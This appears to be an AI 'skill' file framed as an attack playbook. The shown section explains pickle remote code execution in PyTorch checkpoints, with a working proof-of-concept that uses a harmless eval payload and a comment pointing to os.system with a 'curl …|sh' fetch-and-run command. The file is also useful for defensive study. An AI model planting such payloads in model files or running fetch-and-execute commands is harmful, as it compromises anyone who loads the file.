ai-ml-security


SKILL: AI/ML Security — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.

0. RELATED ROUTING


1. MODEL SUPPLY CHAIN ATTACKS

1.1 Malicious Model Files — Pickle RCE

Python's pickle module executes arbitrary code during deserialization: any object can define __reduce__ to return a callable plus arguments, and pickle invokes that callable at load time. PyTorch .pt/.pth checkpoints use pickle under the hood, so calling torch.load() on an untrusted model file is remote code execution (older PyTorch versions deserialize pickled payloads by default; newer releases mitigate this with weights_only loading).
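A minimal sketch of the primitive, using only the standard library. The EvilCheckpoint class and the benign eval payload are illustrative stand-ins: a real malicious model file would return something like (os.system, ("curl …|sh",)) instead, and the payload would be embedded inside the pickle stream of a .pt archive rather than a raw pickle blob.

```python
import pickle

class EvilCheckpoint:
    """Stand-in for a poisoned model file. PyTorch .pt/.pth archives
    embed pickled object metadata, so the same primitive fires when
    the file is loaded without safeguards."""
    def __reduce__(self):
        # pickle calls the returned callable with these args at load
        # time. eval("6*7") is a harmless demo payload; an attacker
        # would substitute os.system / subprocess with a shell command.
        return (eval, ("6*7",))

blob = pickle.dumps(EvilCheckpoint())   # what ships in the model file
result = pickle.loads(blob)             # attacker code runs HERE
print(result)                           # → 42: proof the payload executed
```

Note that the victim never calls any method on the object; deserialization alone triggers execution, which is why scanning model weights for "suspicious layers" misses this class of attack entirely.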
